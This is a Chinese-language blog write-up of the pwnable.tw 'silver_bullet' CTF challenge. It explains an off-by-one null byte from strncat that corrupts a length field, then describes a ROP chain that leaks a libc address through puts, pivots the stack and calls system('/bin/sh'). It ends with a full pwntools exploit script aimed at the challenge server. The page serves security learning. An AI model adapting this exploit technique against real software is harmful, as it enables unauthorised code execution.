<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>pwnable.tw-silver_bullet | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="silver_bullet1)基本逻辑依旧是菜单类型的小游戏：  这道题就是create一个silver bullet（简称sb），输入的字符串长度就是sb的能量，power up会用strncat连接上新输入的字符串，仍旧是长度是能量，然后能量达到一定值时beat ，然后返回。 2)漏洞power_up函数中，用到了strncat，而该函数会在末尾主动加入\0。这个操作有机会覆盖s[48]，即记">
<meta property="og:type" content="article">
<meta property="og:title" content="pwnable.tw-silver_bullet">
<meta property="og:url" content="http://yoursite.com/2018/03/08/pwnable-tw-silver-bullet/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="silver_bullet1)基本逻辑依旧是菜单类型的小游戏：  这道题就是create一个silver bullet（简称sb），输入的字符串长度就是sb的能量，power up会用strncat连接上新输入的字符串，仍旧是长度是能量，然后能量达到一定值时beat ，然后返回。 2)漏洞power_up函数中，用到了strncat，而该函数会在末尾主动加入\0。这个操作有机会覆盖s[48]，即记">
<meta property="og:image" content="http://yoursite.com/2018/03/08/pwnable-tw-silver-bullet/menu.png">
<meta property="og:image" content="http://yoursite.com/2018/03/08/pwnable-tw-silver-bullet/power_up.png">
<meta property="og:image" content="http://yoursite.com/2018/03/08/pwnable-tw-silver-bullet/ROP1.png">
<meta property="og:image" content="http://yoursite.com/2018/03/08/pwnable-tw-silver-bullet/ROP2.png">
<meta property="og:image" content="http://yoursite.com/2018/03/08/pwnable-tw-silver-bullet/ROP3.png">
<meta property="og:image" content="http://yoursite.com/2018/03/08/pwnable-tw-silver-bullet/whole.png">
<meta property="og:image" content="http://yoursite.com/2018/03/08/pwnable-tw-silver-bullet/ROP3.png">
<meta property="og:updated_time" content="2018-03-08T08:40:09.964Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="pwnable.tw-silver_bullet">
<meta name="twitter:description" content="silver_bullet1)基本逻辑依旧是菜单类型的小游戏：  这道题就是create一个silver bullet（简称sb），输入的字符串长度就是sb的能量，power up会用strncat连接上新输入的字符串，仍旧是长度是能量，然后能量达到一定值时beat ，然后返回。 2)漏洞power_up函数中，用到了strncat，而该函数会在末尾主动加入\0。这个操作有机会覆盖s[48]，即记">
<meta name="twitter:image" content="http://yoursite.com/2018/03/08/pwnable-tw-silver-bullet/menu.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
</head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Suche"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://yoursite.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-pwnable-tw-silver-bullet" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2018/03/08/pwnable-tw-silver-bullet/" class="article-date">
  <time datetime="2018-03-08T08:09:21.000Z" itemprop="datePublished">2018-03-08</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      pwnable.tw-silver_bullet
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="silver-bullet"><a href="#silver-bullet" class="headerlink" title="silver_bullet"></a>silver_bullet</h1><h2 id="1-基本逻辑"><a href="#1-基本逻辑" class="headerlink" title="1)基本逻辑"></a>1)基本逻辑</h2><p>依旧是菜单类型的小游戏：</p>
<p><img src="/2018/03/08/pwnable-tw-silver-bullet/menu.png" alt="menu"></p>
<p>这道题就是create一个silver bullet（简称sb），输入的字符串长度就是sb的能量，power up会用strncat连接上新输入的字符串，仍旧是长度是能量，然后能量达到一定值时beat ，然后返回。</p>
<h2 id="2-漏洞"><a href="#2-漏洞" class="headerlink" title="2)漏洞"></a>2)漏洞</h2><p>power_up函数中，用到了strncat，而该函数<strong>会在末尾主动加入\0</strong>。这个操作有机会覆盖s[48]，即记录字符串长度的最低位。</p>
<p><img src="/2018/03/08/pwnable-tw-silver-bullet/power_up.png" alt="漏洞所在--power_up函数"></p>
<h2 id="3-漏洞利用"><a href="#3-漏洞利用" class="headerlink" title="3)漏洞利用"></a>3)漏洞利用</h2><p>考虑到power_up只在s[48]&lt;=47时起作用，可以分两次操作：先create一个47长度的sb，然后power_up 1，通过strncat，\0就会覆盖s[48]，再计算长度时就为0+1=1</p>
<p>这样就可以继续再写47个字符了，并且是从s[48]之后开始写。</p>
<p>继续写的字符可以伪造ROP，当然为了返回，应该首先执行beat函数，将s[48]的之后三位写成FF FF FF，这样当以int类型读取字符串大小时（即从s[48]开始，长度为4的int），大小为FFFFFF01，就可以利用beat成功返回了。</p>
<p><strong>system函数地址泄露：</strong>通过puts输出函数地址，从而泄露system的地址。因为可以继续写47个字符，将有机会覆写main的返回地址。将main的返回地址写为puts@plt，并在此处构造ROP结构，称为ROP1，puts函数的参数为puts@got，即读出puts的实际地址，进而泄露system地址。由于ROP1中不能继续构造新的ROP，因此将返回地址位置写为一个gadget。</p>
<p><img src="/2018/03/08/pwnable-tw-silver-bullet/ROP1.png" alt="puts函数的ROP1结构"></p>
<p><strong>system函数调用：</strong></p>
<p><strong>1）写入system函数–read_input：</strong>上一步只是泄露了system的地址，并未写入到栈结构中，因此需要另一次机会将system地址写入，程序中提供的read_input函数正好可以实现这个功能。这就要求从puts函数返回之后应该继续执行read_input函数，找到一个pop|retn 的gadget作为ROP1 的返回地址，执行时先pop出puts@got，再返回read_input。</p>
<p>接着构造一个read_input函数的ROP结构，称为ROP2。由于栈溢出只能再写47个字节，再写一个system的ROP结构不够用，因此考虑在另一块空间继续写入system的ROP结构。这个空间可以选在BSS段之后的地址，起名为fake_addr。read_input的第一个参数为fake_addr，第二个参数为大小，返回地址争取直接跳到fake_addr处。</p>
<p>在覆写main函数返回地址时将ebp覆写为fake_addr，之后保证ebp不变，在ROP2的返回地址处写入leave|retn的gadget使得 leave时 esp = ebp = fake_addr，pop ebp，然后返回执行system函数。</p>
<p><img src="/2018/03/08/pwnable-tw-silver-bullet/ROP2.png" alt="read_input函数的ROP2"></p>
<p><strong>2）system函数的ROP</strong>：先是一个随意的值用于pop ebp，接着写入system地址和参数。</p>
<p><img src="/2018/03/08/pwnable-tw-silver-bullet/ROP3.png" alt="system函数的ROP3结构"></p>
<p>整体的栈结构如下：</p>
<p><img src="/2018/03/08/pwnable-tw-silver-bullet/whole.png" alt=""></p>
<p><img src="/2018/03/08/pwnable-tw-silver-bullet/ROP3.png" alt="整体栈结构"></p>
<h2 id="4-exp"><a href="#4-exp" class="headerlink" title="4) exp"></a>4) exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">debug = <span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> debug:</span><br><span class="line">    p = process(<span class="string">'./silver_bullet'</span>)</span><br><span class="line">    libc = ELF(<span class="string">'./libc.so'</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    p = remote(<span class="string">'chall.pwnable.tw'</span>,<span class="number">10103</span>)</span><br><span class="line">    libc = ELF(<span class="string">'./libc_32.so.6'</span>)</span><br><span class="line"></span><br><span class="line">d = <span class="number">0</span></span><br><span class="line"><span class="comment">#gdb.attach(p,'b*0x80485eb')</span></span><br><span class="line"><span class="comment"># create size:47</span></span><br><span class="line">p.recvuntil(<span class="string">'Your choice :'</span>)</span><br><span class="line">p.sendline(<span class="string">'1'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'Give me your description of bullet :'</span>)</span><br><span class="line">payload1 =<span class="string">'a'</span> * <span class="number">47</span></span><br><span class="line">p.send(payload1)</span><br><span class="line"></span><br><span class="line"><span class="comment"># overflow size:1</span></span><br><span class="line">p.recvuntil(<span class="string">'Your choice :'</span>)</span><br><span class="line">p.sendline(<span class="string">'2'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'Give me your another description of bullet :'</span>)</span><br><span class="line">payload2 =<span class="string">'b'</span></span><br><span class="line">p.send(payload2)</span><br><span class="line"></span><br><span class="line"><span class="comment">#overwrite stack</span></span><br><span class="line">p.recvuntil(<span class="string">'Your choice :'</span>)</span><br><span class="line">p.sendline(<span class="string">'2'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'Give me your another description of bullet :'</span>)</span><br><span class="line"></span><br><span class="line">puts_plt = <span class="number">0x80484a8</span></span><br><span class="line">puts_got = <span class="number">0x804afdc</span></span><br><span class="line">fake_addr = <span class="number">0x804b410</span></span><br><span class="line"></span><br><span class="line">pr_addr = <span class="number">0x08048475</span></span><br><span class="line">lr_addr = <span class="number">0x8048a18</span></span><br><span class="line">read_input = <span class="number">0x80485eb</span></span><br><span class="line">payload3 = <span class="string">'\xff'</span> * <span class="number">3</span> + p32(fake_addr) + p32(puts_plt) + p32(pr_addr) + p32(puts_got) + p32(read_input) + p32(lr_addr) + p32(fake_addr) + p32(<span class="number">0x1011</span>)</span><br><span class="line"></span><br><span class="line">p.send(payload3)</span><br><span class="line"><span class="comment">#beat and execute </span></span><br><span class="line">p.recvuntil(<span class="string">'Your choice :'</span>)</span><br><span class="line"><span class="keyword">if</span> d:</span><br><span class="line">    gdb.attach(p)</span><br><span class="line">p.sendline(<span class="string">'3'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'Oh ! You win !!\n'</span>)</span><br><span class="line">puts_addr = u32(p.recv(<span class="number">4</span>))</span><br><span class="line">system_addr = puts_addr - (libc.symbols[<span class="string">'puts'</span>]-libc.symbols[<span class="string">'system'</span>])</span><br><span class="line"><span class="keyword">print</span> <span class="string">'puts_addr: 0x%x'</span> %puts_addr</span><br><span class="line"></span><br><span class="line"><span class="comment">#read_input content</span></span><br><span class="line">payload = p32(fake_addr) + p32(system_addr) + p32(<span class="number">0xdeadbeef</span>) + p32(fake_addr + <span class="number">0x10</span>) + <span class="string">'/bin/sh'</span></span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2018/03/08/pwnable-tw-silver-bullet/" data-id="cji1s5rcm0002l8u64gew3zqb" class="article-share-link">Teilen</a>
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2018/03/13/unsortedbin-attack-0ctf-zerostorage/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Neuer</strong>
      <div class="article-nav-title">
        
          unsortedbin_attack--0ctf zerostorage
        
      </div>
    </a>
  
  
    <a href="/2018/03/08/pwnable-tw-hacknote/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Älter</strong>
      <div class="article-nav-title">pwnable.tw--hacknote</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/pwn-how2heap/">pwn how2heap</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/pwn-how2heap/" style="font-size: 10px;">pwn how2heap</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archiv</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/03/">March 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/02/">February 2018</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">letzter Beitrag</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2018/03/13/unsortedbin-attack-0ctf-zerostorage/">unsortedbin_attack--0ctf zerostorage</a>
          </li>
        
          <li>
            <a href="/2018/03/08/pwnable-tw-silver-bullet/">pwnable.tw-silver_bullet</a>
          </li>
        
          <li>
            <a href="/2018/03/08/pwnable-tw-hacknote/">pwnable.tw--hacknote</a>
          </li>
        
          <li>
            <a href="/2018/02/07/HITCTF-PWN/">HITCTF PWN</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2018 John Doe<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>



  </div>
</body>
</html>